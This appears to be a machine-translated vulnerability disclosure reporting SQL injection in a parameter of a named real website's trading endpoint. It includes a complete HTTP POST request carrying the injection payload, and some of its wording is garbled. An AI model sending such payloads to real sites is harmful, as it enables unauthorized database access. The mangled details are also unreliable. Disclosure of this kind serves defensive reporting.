One web site SQL Injection
The donkey meat at the door of the apartment tastes good, so I don't want to ask
Detailed description:
Proof of vulnerability:
An error is prompted when there are few single quotes:
Normal injection returns normal:
POST http://www.ganji.com/trading/refresh/select.php? Vaction = detail HTTP/1.1
Host: www.ganji.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv: 41.0) Gecko/20100101 Firefox/41.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: zh-CN, zh; q = 0.8, en-US; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 362
Count = 96 & dianjing_id = 1' and 1 = 1 * or '1' = '1 & is_renew = 1 & source = uc_account & city_id = & major_id = & isUserDefinePirce = & zhifubaw.oma = & ispermitaciti.pdf = & post_id = & puid = & youhui_code = 11 & js_click = 400 & category_id = 14 & pcActivity = & renew_value = {"count ": 96, "text": "90", "discount": 0.85, "default": true, "zengsongcount": 6, "oldcount": 90, "cost_price ": 90, "price": 77, "avg": 0.8, "service_save": 19}
I have deleted the cookie and need to log in
Solution:
Filter.